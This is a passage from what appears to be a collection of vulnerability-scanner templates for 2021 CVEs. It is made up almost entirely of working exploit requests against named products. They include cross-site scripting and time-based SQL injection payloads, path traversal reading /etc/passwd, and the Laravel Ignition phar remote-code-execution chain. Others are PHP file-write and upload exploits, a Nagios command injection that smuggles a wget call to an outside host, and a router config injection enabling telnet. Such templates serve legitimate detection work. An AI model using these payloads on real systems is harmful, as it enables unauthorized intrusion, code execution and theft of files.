/vehicle_service/classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /vehicle_service/classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1\n","GET /vehicle_service/admin/?page=user/list HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script> Test</td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-40870","info":{"name":"Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /v1/backend1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n","GET /v1/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35464","info":{"name":"ForgeRock OpenAM <7.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/oauth2/..;/ccversion/Version"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Set-Cookie: JSESSIONID="]},{"type":"word","part":"body","words":["Version Information -","openam/ccversion/Masthead.jsp"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24849","info":{"name":"WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"WCFM Marketplace - Best Multivendor Marketplace for WooCommerce\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{post_data}}\n"],"payloads":{"post_data":["action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--","action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(header, \"application/json\")","contains(body, \"success\")"],"condition":"and"}]}]},{"id":"CVE-2021-24970","info":{"name":"WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"All-in-One Video Gallery\")","contains(body_2, \"Hello world!\")","contains(body_2, \"Welcome to WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-46419","info":{"name":"Telesquare TLR-2855KS6 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["PUT /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nDNT: 1\n\n{{randstr}}\n","DELETE /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nDNT: 1\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 201 && status_code_2 == 204","contains(server_1, \"lighttpd\")"],"condition":"and"}]}]},{"id":"CVE-2021-37416","info":{"name":"Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["></iframe><script>alert(1)</script>","adsf/js/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3129","info":{"name":"Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"AA\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"phar://../storage/logs/laravel.log/test.txt\"}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","Illuminate"],"condition":"and"},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-26723","info":{"name":"Jenzabar 9.2x-9.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24946","info":{"name":"WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"The event is finished\") || contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2021-3654","info":{"name":"Nova noVNC - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh/%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301]}]}]},{"id":"CVE-2021-24370","info":{"name":"WordPress Fancy Product Designer <4.6.9  - Arbitrary File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"error\":\"You need to define a directory"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46107","info":{"name":"Ligeo Archives Ligeo Basics - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')","contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"]}]}]},{"id":"CVE-2021-21800","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>SSH Session </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24827","info":{"name":"WordPress Asgaros Forum <1.15.13 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"asgarosforum\")"],"condition":"and"}]}]},{"id":"CVE-2021-32820","info":{"name":"Express-handlebars - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?layout=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","daemon:[x*]:0:0:","operator:[x*]:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42663","info":{"name":"Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</i><script>alert(document.domain)</script></div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33807","info":{"name":"Cartadis Gespage 8.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["NetpDoDomainJoin:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25298","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Connection Information","Host Check"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-24510","info":{"name":"WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\"></script><script>alert(document.domain)</script><\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27309","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>.php"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41349","info":{"name":"Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /autodiscover/autodiscover.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain);","a=\"\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","negative":true,"words":["A potentially dangerous Request.Form value was detected from the client"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-25028","info":{"name":"WordPress Event Tickets < 5.2.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-25074","info":{"name":"WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-39320","info":{"name":"WordPress Under Construction <1.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php/\"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/wp-admin/admin.php/\"><script>alert(document.domain)</script>","under-construction"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44848","info":{"name":"Thinfinity VirtualUI User Enumeration","severity":"medium"},"requests":[{"raw":["GET /changePassword?username=administrator HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"rc\":(.*?)","\"msg\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24750","info":{"name":"WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45968","info":{"name":"Pascom CPS  - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /services/pluginscript/ HTTP/1.1\nHost: {{Hostname}}\nGET /services/pluginscript/..;/..;/ HTTP/1.1\nHost: {{Hostname}}\nGET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 != status_code_1"],"condition":"and"}]}]},{"id":"CVE-2021-24875","info":{"name":"WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"eCommerce Product Catalog\")"],"condition":"and"}]}]},{"id":"CVE-2021-24286","info":{"name":"WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"alert%28document.domain%29\") && contains(body_2, \"Moove redirect 404\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-46422","info":{"name":"SDT-CW3B1 1.1.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>"]},{"type":"word","name":"http","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2021-25067","info":{"name":"Landing Page Builder < 1.4.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test\"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"test\\\\\\\" style=animation-name:rotation onanimationstart=alert(document.domain)\")","contains(body_2, \"Enter Page Title\")"],"condition":"and"}]}]},{"id":"CVE-2021-24284","info":{"name":"WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------d3be34324392a708\n\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fonticonzipfile\"; filename=\"{{zip_file}}.zip\"\nContent-Type: application/octet-stream\n\n{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fontsetname\"\n\n{{zip_file}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"action\"\n\nuploadFontIcon\n--------------------------d3be34324392a708--\n","GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"]},{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41569","info":{"name":"SAS/Internet 9.4 1520 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20091","info":{"name":"Buffalo WSR-2533DHPL2 - Configuration File Injection","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","POST /images/..%2fapply_abstract.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n\naction=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/Success.htm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-26855","info":{"name":"Microsoft Exchange Server SSRF Vulnerability","severity":"critical"},"requests":[{"raw":["GET /owa/auth/x.js HTTP/1.1\nHost: {{Hostname}}\nCookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-30213","info":{"name":"Knowage Suite 7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21402","info":{"name":"Jellyfin <10.7.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/","{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/octet-stream"]},{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41282","info":{"name":"pfSense - Arbitrary File Write","severity":"high"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=\n","GET 